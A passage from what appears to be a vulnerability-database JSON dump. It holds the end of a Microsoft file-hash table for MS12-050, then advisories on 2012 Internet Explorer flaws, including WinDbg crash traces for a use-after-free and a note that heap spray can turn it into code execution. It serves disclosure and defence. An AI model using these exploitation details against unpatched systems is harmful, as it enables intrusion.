class=\"sbody-td\">wss2003-kb2760604-fullfile-fra.exe</td><td class=\"sbody-td\">777EA2C387B381768D1111E607779E70E41FDF1F</td><td class=\"sbody-td\">744ACE78426672E9EC75817E5D4D3B412DD272B7384C80190BE0B6FA2DB73BE7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-heb.exe</td><td class=\"sbody-td\">BDC9CAA8D266554B0ED9694562EB4E9B9C7368D1</td><td class=\"sbody-td\">7F7C8210CF6991AFFF14703E780E1191306B1856B00B95BC2F27B7EE59B5FB7E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-hin.exe</td><td class=\"sbody-td\">0B68573CDAAC765D4ABF325CD3996D1E2E667A17</td><td class=\"sbody-td\">F32BBA4CE8B5861F180261676CA6B44F1DAC36F9175D176EC69062A975C197AC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-hrv.exe</td><td class=\"sbody-td\">A0917833FD05D8C9175EBAA73BA83CD1C1A25F30</td><td class=\"sbody-td\">FCD5ADF13D09A8DCEC75210F4A452405C8266BB8476EBC4B54D5146BAA2FF8E7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-hun.exe</td><td class=\"sbody-td\">8329B99DEF9698D3E1D9260DD7F491B99C519584</td><td class=\"sbody-td\">AAB418A8CB3658D061B7356AA3AC1FB0F2A9D68632EEE2664900A1535C46D2A4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-ita.exe</td><td class=\"sbody-td\">DC7A8679DFB3D21E796A6E61C201437EA1AA5C2F</td><td class=\"sbody-td\">F1D53091A9F95E970642C3A4F612237DAF5BA24414A3F1E9B7A8D8F21F5248F5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-jpn.exe</td><td class=\"sbody-td\">563502557130AFE06614CDB1CE2FFBA352B74739</td><td class=\"sbody-td\">58F48E2973284C3DAC005B7DB1B3DD9C64FB6F898A027F167E335C3B566FE69C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-kor.exe</td><td class=\"sbody-td\">A7BD3032953031CDC511666250AECE3F87C64F0B</td><td class=\"sbody-td\">88B675F6DC0F393725B135C1FD7DBBE3F46289221803FF547669A1388EAA996C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-lth.exe</td><td class=\"sbody-td\">963D99379FF4515725F8DD1594872EB0973E42A4</td><td class=\"sbody-td\">DE8E907C37917D93DA25FEBDB2C7E5A033E486D1D1B2A7D97001486FD0467DAB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-lvi.exe</td><td class=\"sbody-td\">40B44B094CD1ABDF693AC0C44429888EB07B99F6</td><td class=\"sbody-td\">13841434EA8994760EEF0C7626FAA473F582763B9B9214C94F53B0BEFEFA28BF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-nld.exe</td><td class=\"sbody-td\">F4F356BC58494D3EB2146955A512163473F5C18C</td><td class=\"sbody-td\">5BBD181CD9F4B518751A47A5F59D821D3F486763CE2050F34173C4F377C1765A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-nor.exe</td><td class=\"sbody-td\">1BFDAC7CA337DD926FA851DFC44B6C8EB3787D44</td><td class=\"sbody-td\">1855342D407C705D8AA1EE14030C2BFF23E4A1022A87D0121EA937EFC0A5735A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-plk.exe</td><td class=\"sbody-td\">854ACEEC4ED26C8F2AF6115F8357D3E18D95BF46</td><td class=\"sbody-td\">266194456C096A44F03C180744B74A0A9827F34BA79DB5FC857D271B11FDC2D0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-ptb.exe</td><td class=\"sbody-td\">80AFB3A70ADD47AF15C5C811298248DA06BFE60F</td><td class=\"sbody-td\">65CEF35AB79343C01CA79C550A4AB72F9F5A1EF786F539BFF6484450C0A05AFF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-ptg.exe</td><td class=\"sbody-td\">064033EDCD99453BDA48A6EF012F76E0FFC1422C</td><td class=\"sbody-td\">6C4BC8DA2B32B3F854D70DF23AEB9BF0A715B7DAC9F35C6399B2D0DEA7E9FB0A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-rom.exe</td><td class=\"sbody-td\">FF36147DCBB752ACE97C682B1D8B8935A848C5D0</td><td class=\"sbody-td\">4128BAD2C2DDD45017530CECC0C2A7ADC0B88D3BCF5072170FF7D97A1E9BF26D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-rus.exe</td><td class=\"sbody-td\">35B3BDC570F6D82475A62C38171260B24BE2266B</td><td class=\"sbody-td\">4391A7761F2DB2FB3058FCA6E306519DA44EAEBDE2A990B520FA1EE3F60E360E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-sky.exe</td><td class=\"sbody-td\">1D5A41747ABC246F69A1C61E36B524604E5A0FEC</td><td class=\"sbody-td\">B598C60AD4FE2C82A7B43D390B32D6917A2637378B679A11C8D52E433840507F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-slv.exe</td><td class=\"sbody-td\">CE0131A5858230363BFDD3BF6EA399ABDE1378BC</td><td class=\"sbody-td\">3605324E72645A7E126E037DCBC79827DE28DDD364C95DB79FB416402462EAEF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-srl.exe</td><td class=\"sbody-td\">AD4A19231C72A880D361BFF018773F3486BED26C</td><td class=\"sbody-td\">A1B5F71EDEB27A906C98438E3429882C82EC60CF58815EE10AE6BADAD97B949E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-sve.exe</td><td class=\"sbody-td\">94575D9AEC7CC927278BA869A31EEB42A760D324</td><td class=\"sbody-td\">CEC7BFD45C09D1E52F1DD4137B558D9D7B9613353B26C2C54A652E80C5FCFD68</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-tha.exe</td><td class=\"sbody-td\">6999EECC0D501ABFF9B490203C5E2016E1617B99</td><td class=\"sbody-td\">B6D0DF67C45B6F5C1368C3B23AB624DB6127B03D5C980FC29D842488FAC27205</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-trk.exe</td><td class=\"sbody-td\">B62A256B76FBEE70FB51EF41700D164B9DF1B548</td><td class=\"sbody-td\">309659C1C8060265A6DB0C6C31F89720A61F8DD065FA3DCD8A9AC5CA389FCB4F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-ukr.exe</td><td class=\"sbody-td\">92C0AD7EE66A4E20AC22D23CCA4D405FB53ED927</td><td class=\"sbody-td\">8C1EC306BA0883730D2D5C554DD9116998C2F11B816D20A236A78E7EF671CEE4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2003-kb2760604-fullfile-zhh.exe</td><td class=\"sbody-td\">18B05B146DE37B421C37EDB2CC8801884044B8B5</td><td class=\"sbody-td\">3402D3016F8500DDC25E566D50CB91130885BE25A509643BA96F9B9D8DB3FA24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">coreserver2007-kb2596663-fullfile-x64-glb.exe</td><td class=\"sbody-td\">B4B8C2D03393AFAE2D609B3E22E9C54459170AB7</td><td class=\"sbody-td\">287BA5C0B0672DB4FBF9A7C15A539F6699FA1BA91A4170B049308C52DBB0FA22</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">coreserver2007-kb2596663-fullfile-x86-glb.exe</td><td class=\"sbody-td\">459B707CC63E3F0B38D87BA0968D89C7D7766707</td><td class=\"sbody-td\">0B187B5ACC20FC8EBC4CCC1BF658D51E4A4DA4F564C2CA1B92B432A0C40C6D2C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">coreserverloc2010-kb2553194-fullfile-x64-glb.exe</td><td class=\"sbody-td\">92515E81643BBB6DDFFEB3D6295645322BE1C094</td><td class=\"sbody-td\">D29D2A72BAE50717011AC007AEACD1B69E802FD5E4D4AC3A0A7DB27488EDEB0F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">emsgrs2010-kb2589325-fullfile-x64-glb.exe</td><td class=\"sbody-td\">C40B9731DA0D72958E97C37C8562676E9035DF1E</td><td class=\"sbody-td\">98D9F03A1B94B0C6085E320A760F64391A1E6F34064666D140E55252F1B2908C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">infopath2007-kb2596666-fullfile-x86-glb.exe</td><td class=\"sbody-td\">6089333AEB61B4F0613898C33F8583A15957D782</td><td class=\"sbody-td\">C6440DAB225C67F0C290A1AD0B85C72BA3C6B2F813B0901B04FCABDF1FC9B086</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">infopath2010-kb2553431-fullfile-x64-glb.exe</td><td class=\"sbody-td\">CF9C2F85761B14386A848CD89E5C517F632ECF08</td><td class=\"sbody-td\">6A16C443958BEFAE24E861E053B04EB09CB78A777DAF9A7C603E70DAAD6E5D2D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">infopath2010-kb2553431-fullfile-x86-glb.exe</td><td class=\"sbody-td\">C1CF3BFC26754C57F8A5C111C014015BEC5D6D3B</td><td class=\"sbody-td\">8AACEAE7227509C592442829FA06D6924E48C8E15D5238C79104E9C716ADA5D9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ipeditor2007-kb2596786-fullfile-x86-glb.exe</td><td class=\"sbody-td\">C098589CFF0B676B80C4C5B2E145B9BD93E2C355</td><td class=\"sbody-td\">6611329D0E156EB2DC01584F9ED1EF72BD08D81FE083FFC57ACD541BB0D31700</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ipeditor2010-kb2553322-fullfile-x64-glb.exe</td><td class=\"sbody-td\">CE8A14DBFA1513CF843B37B30113A37DE5EB33FF</td><td class=\"sbody-td\">B721DCF88277D1271DE22C3A1E7869389C3EB976BDE8C7176CD74C0E322ACC35</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ipeditor2010-kb2553322-fullfile-x86-glb.exe</td><td class=\"sbody-td\">2C9EC3F1D70A4E04A15D81DC6AE75ABEC168E700</td><td class=\"sbody-td\">5F269A2559012056B6F16DB638365F7225C143B524AFC0DA77331671933952EF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sts-x-none-x64.cab</td><td class=\"sbody-td\">C093C7C13D7CB01D5F7B2F244399DBC34BB10D20</td><td class=\"sbody-td\">05853D2678F4D335A0BCFC1AA74E79D980072A7F23CAABF64C2635675210F54C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sts-x-none-x86.cab</td><td class=\"sbody-td\">13258CA09C2D2A019C5E1F7EEFD53378B53A93CA</td><td class=\"sbody-td\">CFE52C1389B605C1E3AAB0024D7C771828E799F5F8FD1C4C010F3A86992B4560</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sts2007-kb2596911-fullfile-x64-glb.exe</td><td class=\"sbody-td\">302CB71DCB952EB7AE2BB7A0DFCB3826488DFFD9</td><td class=\"sbody-td\">E01E674F45D599895EA65579874D22F3A990E385EBAABA69FEE232095147DF4E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sts2007-kb2596911-fullfile-x86-glb.exe</td><td class=\"sbody-td\">3B815B9647BB14E549B89BF61E26AF34BCE63006</td><td class=\"sbody-td\">DE51614C7107B26600E44AE5AE6AA12B6D4BC2E5C2BD84ADCFD39E409529371C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wac2010-kb2598239-fullfile-x64-glb.exe</td><td class=\"sbody-td\">5DA77BDDC33BA933C94C5922FD037796A74CDD50</td><td class=\"sbody-td\">60E369CA03A8237938070573F31DCB1AFCFAD738616C6F2E75B7D6CBFCEEC184</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wosrv2010-kb2553424-fullfile-x64-glb.exe</td><td class=\"sbody-td\">6DF33A7F0FCD21696C581DA461805BC245D5E5D4</td><td class=\"sbody-td\">057090BC16ED1EB4974ABA40E2FC79AB4AED3D431E2224002F6402847439A2E0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">wss2010-kb2553365-fullfile-x64-glb.exe</td><td class=\"sbody-td\">1974AEBB7C576D58499CDEDB25C426FAAEDA0C57</td><td class=\"sbody-td\">CC9980F485D951CFAD7E2B9FB93F70C1703C8DEC1E4EB91AD5EB7DC8F95BCE39</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xlsrvwfe2007-kb2596942-fullfile-x64-glb.exe</td><td class=\"sbody-td\">3D987EDEAE127AA515409E02448A3CFDE785EF79</td><td class=\"sbody-td\">E895F8A3E13B19D0A48F64194B712F5CB00B4EF532038EBEF9EAB8BB3E80105D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xlsrvwfe2007-kb2596942-fullfile-x86-glb.exe</td><td class=\"sbody-td\">F54164686BC47A54EB7CD22096DCE7932DD60F3A</td><td class=\"sbody-td\">C3F8E89D78BFC09257F5E97E9CEA68567225506366B4DFE8CC9586EF2226FBF9</td></tr></table></div></div></body></html>", "edition": 2, "cvss3": {}, "published": "2012-07-10T00:00:00", "type": "mskb", "title": "MS12-050: Vulnerabilities in SharePoint could allow elevation of privilege: July 10, 2012", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1862", "CVE-2012-1858", "CVE-2012-1863", "CVE-2012-1861", "CVE-2012-1860", "CVE-2012-1859"], "modified": "2012-12-11T20:04:29", "id": "KB2695502", "href": "https://support.microsoft.com/en-us/help/2695502/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2021-06-08T19:16:47", "description": "Multiple memory corruptions, code executions, information leakage.", "cvss3": {}, "published": "2012-06-25T00:00:00", "type": "securityvulns", "title": "Microsoft Internet Explorer multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-1876", "CVE-2012-1875", "CVE-2012-1880", "CVE-2012-1872", "CVE-2012-1881", "CVE-2012-1858", "CVE-2012-1878", "CVE-2012-1523", "CVE-2012-1882", "CVE-2012-1879", "CVE-2012-1874", "CVE-2012-1873", "CVE-2012-1877"], "modified": "2012-06-25T00:00:00", "id": "SECURITYVULNS:VULN:12404", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12404", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "description": "[CAL-2012-0026] Microsfot IE Same ID Property Remote Code Execution\r\nVulnerability\r\n\r\n\r\n\r\nCVE ID: CVE-2012-1875\r\nhttp://technet.microsoft.com/en-us/security/bulletin/ms12-037\r\nhttp://blog.vulnhunt.com/index.php/2012/06/13/cal-2012-0026-microsfot-ie-same-id-property-remote-code-execution-vulnerability/\r\n\r\n\r\n1 Affected Products\r\n=================\r\nIE8\r\nwe tested:Internet Explorer 8.0.6001.18702\r\n\r\n\r\n2 Vulnerability Details\r\n======================\r\n\r\nThe vulnerability occurs when a img element and a div element have same\r\nid property, when remove them, img\r\nelement is freed from memory, but CCollectionCache keep a reference to\r\nit, so it cause a use after free\r\nvulnerability, which can cause Remote Code Execution.\r\n\r\n\r\n\r\n3 Analysis\r\n===========\r\nasm in mshtml.dll\r\n\r\nbp mshtml!CCollectionCache::GetAtomFromName\r\nwhen break if ecx points to a CImgElement, remember ecx\r\nBreakpoint 0 hit\r\neax=03341301 ebx=033413e0 ecx=033413e0 edx=00000001 esi=0000030c\r\nedi=016aa348\r\neip=3db74101 esp=016aa300 ebp=016aa350 iopl=0 nv up ei pl nz na\r\npo nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00000202\r\nmshtml!CCollectionCache::GetAtomFromName:\r\n3db74101 8bff mov edi,edi\r\n0:008> dds ecx l4\r\n033413e0 3dabe880 mshtml!CImgElement::`vftable'\r\n033413e4 00000001\r\n033413e8 00000008\r\n033413ec 001a7ad0\r\n\r\n0:008> bd 0\r\n0:008> g\r\n(2178.2120): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=3db401b2 ebx=00000000 ecx=033413e0 edx=8bffff53 esi=033413e0\r\nedi=016aa348\r\neip=8bffff53 esp=016aa2dc ebp=016aa2ec iopl=0 nv up ei pl zr na\r\npe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00010246\r\n8bffff53 ?? ???\r\n0:008> kb\r\nChildEBP RetAddr Args to Child\r\nWARNING: Frame IP not in any known module. Following frames may be wrong.\r\n016aa2d8 3db56ce7 3db61cdb 80020003 033413e0 0x8bffff53\r\n016aa2dc 3db61cdb 80020003 033413e0 016aa2fc mshtml!CElement::Doc+0x7\r\n016aa2ec 3db74116 00000000 0000030c 016aa350\r\nmshtml!CElement::GetAtomTable+0x10\r\n016aa2fc 3dac2bc9 009af5ac 00000003 03341301\r\nmshtml!CCollectionCache::GetAtomFromName+0x15\r\n016aa350 3dae11bd 033414a0 009af5ac 00000003\r\nmshtml!CCollectionCache::GetIntoAry+0x74\r\n016aa394 3dae1cb5 0000000d 009af5ac 016aa480\r\nmshtml!CCollectionCache::GetDispID+0x13e\r\n016aa3a8 3dacfa5c 033414a0 0000000d 009af5ac\r\nmshtml!DispatchGetDispIDCollection+0x3f\r\n016aa3d0 3db61de3 0019adf0 009af5ac 10000003\r\nmshtml!CElementCollectionBase::VersionedGetDispID+0x46\r\n016aa410 3e374e18 0019aeb0 009af5ac 10000003 mshtml!PlainGetDispID+0xdc\r\n016aa440 3e374d99 009af5ac 016aa480 0019aeb0\r\njscript!IDispatchExGetDispID+0xb7\r\n\r\nmshtml!CElement::Doc:\r\n3db56ce0 8b01 mov eax,dword ptr [ecx]\r\n3db56ce2 8b5070 mov edx,dword ptr [eax+70h]\r\n3db56ce5 ffd2 call edx\r\n3db56ce7 8b400c mov eax,dword ptr [eax+0Ch]\r\n\r\n\r\n4 Exploitable?\r\n============\r\nif overwrite freed memory with controlled content, combined with heap\r\nspray, can cause remote code execution.\r\n\r\nand we noticed that the exploitation attack in the wild.\r\n\r\n\r\n5 Crash info:\r\n===============\r\n(2430.2450): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=3db401b2 ebx=00000000 ecx=002455b8 edx=8bffff53 esi=002455b8\r\nedi=016aa348\r\neip=8bffff53 esp=016aa2dc ebp=016aa2ec iopl=0 nv up ei pl zr na\r\npe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00010246\r\n8bffff53 ?? ???\r\n0:008> kb\r\nChildEBP RetAddr Args to Child\r\nWARNING: Frame IP not in any known module. Following frames may be wrong.\r\n016aa2d8 3db56ce7 3db61cdb 80020003 002455b8 0x8bffff53\r\n016aa2dc 3db61cdb 80020003 002455b8 016aa2fc mshtml!CElement::Doc+0x7\r\n016aa2ec 3db74116 00000000 0000030c 016aa350\r\nmshtml!CElement::GetAtomTable+0x10\r\n016aa2fc 3dac2bc9 009af528 00000003 00245501\r\nmshtml!CCollectionCache::GetAtomFromName+0x15\r\n016aa350 3dae11bd 00245678 009af528 00000003\r\nmshtml!CCollectionCache::GetIntoAry+0x74\r\n016aa394 3dae1cb5 0000000d 009af528 016aa480\r\nmshtml!CCollectionCache::GetDispID+0x13e\r\n016aa3a8 3dacfa5c 00245678 0000000d 009af528\r\nmshtml!DispatchGetDispIDCollection+0x3f\r\n016aa3d0 3db61de3 033329c0 009af528 10000003\r\nmshtml!CElementCollectionBase::VersionedGetDispID+0x46\r\n\r\n\r\n\r\n6 TIMELINE:\r\n==========\r\n2012/2/15 Dark son request code audit labs to analyze a POC example\r\n2012/2/15 we begin analyze\r\n2012/2/20 we comfirmed this is an exploitable 0day. report to Microsoft\r\n2012/2/21 Microsoft reply got the report.\r\n2012/2/25 Microsoft begin to investigate\r\n2012/3/1 Microsoft comfirmed this issue.\r\n2012/6/14 Microsoft public this bulletin.\r\n\r\n\r\n7 About Code Audit Labs:\r\n=====================\r\nCode Audit Labs secure your software,provide Professional include source\r\ncode audit and binary code audit service.\r\nCode Audit Labs:" You create value for customer,We protect your value"\r\nhttp://www.VulnHunt.com\r\nhttp://blog.Vulnhunt.com\r\nhttp://t.qq.com/vulnhunt\r\nhttp://weibo.com/vulnhunt\r\nhttps://twitter.com/vulnhunt\r\n\r\n", "cvss3": {}, "published": "2012-06-17T00:00:00", "type": "securityvulns", "title": "[CAL-2012-0026] Microsfot IE Same ID Property Remote Code Execution Vulnerability", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-1875"], "modified": "2012-06-17T00:00:00", "id": "SECURITYVULNS:DOC:28156", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28156", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:45", "description": "VUPEN Security Research - Microsoft Internet Explorer "GetAtomTable" \r\nRemote Use-after-free (MS12-037 / CVE-2012-1875)\r\n\r\nWebsite : http://www.vupen.com/english/research.php\r\n\r\nTwitter : http://twitter.com/vupen\r\n\r\n\r\nI. BACKGROUND\r\n---------------------\r\n\r\n"Microsoft Internet Explorer is a web browser developed by Microsoft and\r\nincluded as part of the Microsoft Windows line of operating systems with\r\nmore than 60% of the worldwide usage share of web browsers." (Wikipedia)\r\n\r\n\r\nII. DESCRIPTION\r\n---------------------\r\n\r\nVUPEN Vulnerability Research Team discovered a critical vulnerability\r\nin Microsoft Internet Explorer.\r\n\r\nThe vulnerability is caused by a use-after-free error in the mshtml.dll\r\nmodule when processing GetAtomTable objects, which could allow remote\r\nattackers to leak memory and execute arbitrary code despite ASLR and DEP.\r\n\r\nCVSS Score: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n\r\n\r\nIII. AFFECTED PRODUCTS\r\n---------------------------\r\n\r\nMicrosoft Internet Explorer 8\r\nMicrosoft Windows XP Service Pack 3\r\nMicrosoft Windows XP Professional x64 Edition Service Pack 2\r\nMicrosoft Windows Server 2003 Service Pack 2\r\nMicrosoft Windows Server 2003 x64 Edition Service Pack 2\r\nMicrosoft Windows Server 2003 with SP2 for Itanium-based Systems\r\nMicrosoft Windows Vista Service Pack 1\r\nMicrosoft Windows Vista Service Pack 2\r\nMicrosoft Windows Vista x64 Edition Service Pack 1\r\nMicrosoft Windows Vista x64 Edition Service Pack 2\r\nMicrosoft Windows Server 2008 for 32-bit Systems\r\nMicrosoft Windows Server 2008 for 32-bit Systems Service Pack 2\r\nMicrosoft Windows Server 2008 for x64-based Systems\r\nMicrosoft Windows Server 2008 for x64-based Systems Service Pack 2\r\nMicrosoft Windows Server 2008 for Itanium-based Systems\r\nMicrosoft Windows Server 2008 for Itanium-based Systems Service Pack 2\r\nMicrosoft Windows 7 for 32-bit Systems\r\nMicrosoft Windows 7 for 32-bit Systems Service Pack 1\r\nMicrosoft Windows 7 for x64-based Systems\r\nMicrosoft Windows 7 for x64-based Systems Service Pack 1\r\nMicrosoft Windows Server 2008 R2 for x64-based Systems\r\nMicrosoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\r\nMicrosoft Windows Server 2008 R2 for Itanium-based Systems\r\nMicrosoft Windows Server 2008 R2 for Itanium-based Systems Service Pack 1\r\n\r\n\r\n\r\nIV. Binary Analysis & Exploits/PoCs\r\n---------------------------------------\r\n\r\nIn-depth technical analysis of the vulnerability and a functional exploit\r\nincluding ASLR and DEP bypass are available through the VUPEN BAE\r\n(Binary Analysis & Exploits) portal:\r\n\r\nhttp://www.vupen.com/english/services/ba-index.php\r\n\r\nVUPEN Binary Analysis & Exploits Service provides private exploits and\r\nin-depth technical analysis of the most significant public vulnerabilities\r\nbased on disassembly, reverse engineering, protocol analysis, and code \r\naudit.\r\n\r\nThe service allows governments and major corporations to evaluate risks, and\r\nprotect infrastructures and assets against new threats. The service also\r\nallows security vendors (IPS, IDS, AntiVirus) to supplement their internal\r\nresearch efforts and quickly develop both vulnerability-based and\r\nexploit-based signatures to proactively protect their customers from attacks\r\nand emerging threats.\r\n\r\n\r\nV. VUPEN Threat Protection Program\r\n-----------------------------------\r\n\r\nGovernments and major corporations which are members of the VUPEN Threat\r\nProtection Program (TPP) have been proactively alerted about the \r\nvulnerability\r\nwhen it was discovered by VUPEN in advance of its public disclosure, and\r\nhave received a detailed attack detection guidance to protect national and\r\ncritical infrastructures against potential 0-day attacks exploiting this\r\nvulnerability:\r\n\r\nhttp://www.vupen.com/english/services/tpp-index.php\r\n\r\n\r\nVI. SOLUTION\r\n----------------\r\n\r\nApply MS12-037 security update.\r\n\r\n\r\nVII. CREDIT\r\n--------------\r\n\r\nThis vulnerability was discovered by Jordan Gruskovnjak of VUPEN Security\r\n\r\n\r\nVIII. ABOUT VUPEN Security\r\n---------------------------\r\n\r\nVUPEN is the leadering provider of advanced vulnerability research for\r\ndefensive and offensive cyber security. VUPEN solutions enable corporations\r\nand governments to measure and manage risks, eliminate vulnerabilities\r\nbefore they can be exploited, and protect critical infrastructures and\r\nassets against known and unknown vulnerabilities.\r\n\r\nVUPEN has been recognized as "Company of the Year 2011 in the Vulnerability\r\nResearch Market" by Frost & Sullivan.\r\n\r\nVUPEN has been recognized as "Company of the Year 2011 in the Vulnerability\r\nResearch Market" by Frost & Sullivan.\r\n\r\nVUPEN solutions include:\r\n\r\n* VUPEN Binary Analysis & Exploits Service (BAE) :\r\nhttp://www.vupen.com/english/services/ba-index.php\r\n\r\n* VUPEN Threat Protection Program (TPP) :\r\nhttp://www.vupen.com/english/services/tpp-index.php\r\n\r\n\r\nIX. REFERENCES\r\n----------------------\r\n\r\nhttp://technet.microsoft.com/en-us/security/bulletin/ms12-037\r\nhttp://www.vupen.com/english/research.php\r\n\r\n\r\nX. DISCLOSURE TIMELINE\r\n-----------------------------\r\n\r\n2012-04-03 - Vulnerability Discovered by VUPEN and shared with customers\r\n2012-06-12 - Public disclosure\r\n", "cvss3": {}, "published": "2012-06-25T00:00:00", "type": "securityvulns", "title": "VUPEN Security Research - Microsoft Internet Explorer "GetAtomTable" Remote Use-after-free (MS12-037 / CVE-2012-1875)", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-1875"], "modified": "2012-06-25T00:00:00", "id": "SECURITYVULNS:DOC:28205", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28205", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "description": "VUPEN Security Research - Microsoft Internet Explorer "Col" Element \r\nRemote Heap Overflow (MS12-037 / CVE-2012-1876)\r\n\r\nWebsite : http://www.vupen.com/english/research.php\r\n\r\nTwitter : http://twitter.com/vupen\r\n\r\n\r\nI. BACKGROUND\r\n---------------------\r\n\r\n"Microsoft Internet Explorer is a web browser developed by Microsoft and\r\nincluded as part of the Microsoft Windows line of operating systems with\r\nmore than 60% of the worldwide usage share of web browsers." (Wikipedia)\r\n\r\n\r\nII. DESCRIPTION\r\n---------------------\r\n\r\nVUPEN Vulnerability Research Team discovered a critical vulnerability\r\nin Microsoft Internet Explorer.\r\n\r\nThe vulnerability is caused by a heap overflow error in the mshtml.dll\r\nmodule when processing "Col" elements, which could allow remote attackers\r\nto leak memory and execute arbitrary code despite ASLR and DEP.\r\n\r\nCVSS Score: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n\r\n\r\nIII. AFFECTED PRODUCTS\r\n---------------------------\r\n\r\nMicrosoft Internet Explorer 10\r\nMicrosoft Internet Explorer 9\r\nMicrosoft Internet Explorer 8\r\nMicrosoft Internet Explorer 7\r\nMicrosoft Internet Explorer 6\r\n\r\nMicrosoft Windows 8 for 32-bit Systems\r\nMicrosoft Windows 8 for x64-based Systems\r\nMicrosoft Windows 7 for 32-bit Systems\r\nMicrosoft Windows 7 for 32-bit Systems Service Pack 1\r\nMicrosoft Windows 7 for x64-based Systems\r\nMicrosoft Windows 7 for x64-based Systems Service Pack 1\r\nMicrosoft Windows Server 2008 for 32-bit Systems\r\nMicrosoft Windows Server 2008 for 32-bit Systems Service Pack 2\r\nMicrosoft Windows Server 2008 for x64-based Systems\r\nMicrosoft Windows 